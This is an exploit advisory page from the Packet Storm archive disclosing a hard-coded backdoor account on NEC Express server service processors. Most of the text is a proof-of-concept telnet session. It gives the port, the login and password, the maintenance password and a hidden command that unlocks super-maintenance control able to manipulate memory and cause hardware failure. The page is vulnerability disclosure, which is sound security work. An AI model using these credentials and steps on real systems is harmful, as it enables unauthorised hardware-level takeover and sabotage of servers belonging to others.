exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NEC Backdoor Administrative Account

NEC Backdoor Administrative Account
Posted May 12, 2012
Authored by Djamshut Saarash

It appears that high performance servers from NEC suffer from a hard-coded administrative account that can manipulate memory.

tags | exploit
SHA-256 | eb4272908d1ad7c1709578a39de60f3cbe679c413cb078dd31662645958fdcb3

NEC Backdoor Administrative Account

Change Mirror Download
   H!

NEC Corp. has a product line of high perfomance servers
- http://www.nec.com.sg/index.php?q=products/enterprise-servers

In the documentations it is said that there is two user privilege
levels:

1. Common user - who can monitor the system status

2. Admin user - for configuring system hardware

but there is another very high privilege user, who can manipulate
memory and produce hardware falure.


POC

Connect to the service processor of the NEC Express server with the
telnet client on port 5001:


Integrated Service Processor.

Cabinet-ID:xx, Location:y, State:ssssss

iSP login: spfw<ENTER>

iSP password: nec<ENTER>

Copyright (C) 2005 NEC Corporation, All Rights Reserved.

Welcome to Integrated Service Processor.

iSP FW version : 01.00 generated on 01/01/2005 19:20:33

iSP MAIN MENU

0) OS(BIOS) serial console of partition#0 (INITIALIZING )

1) OS(BIOS) serial console of partition#1 (RUNNING )

V) Virtual System Operator Panel

S) iSP commands

E) Exit

DISCONNECTALL) disconnect all console connections

iSPyz> s<ENTER>


Go to maintanance mode with the command "cm", default password mainte

Now at the command mode enter (With the periods at the end):


iSP0m:MNT> nec=topvendor.

??? : good-bye.

Command mode was changed to super-maintenance mode.

BE CAREFUL to use each command.

iSP0m:@@@>


you now have super admin rights at the hardware level of the
supercomputer!


Thats it.....
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close